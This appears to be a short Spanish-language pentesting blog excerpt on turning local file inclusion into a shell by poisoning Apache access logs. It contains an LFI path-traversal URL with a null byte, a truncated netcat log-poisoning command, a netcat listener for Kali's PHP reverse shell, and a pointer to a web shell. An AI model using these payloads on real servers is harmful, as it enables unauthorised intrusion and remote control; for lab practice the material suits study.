De access logs a shell en español.

Algunas veces y por diferentes motivos puedes acceder a los logs. Un ejemplo muy típico son los access logs via LFI. http://IP/xyz.php?page=../../../../../%20../../xampp/apache/logs/access.log%00 Puedes infectar los access logs muy fácil con nc root@kali:~# nc -nv...

php shells

Aquí hay dos opciones 1 subir la reverse shell que esta en /usr/share/webshells/php/php-reverse-shell.php y poner un listener root@kali:~# nc -nvlp 9090 2 subir una shell completita https://github.com/flozz/p0wny-shell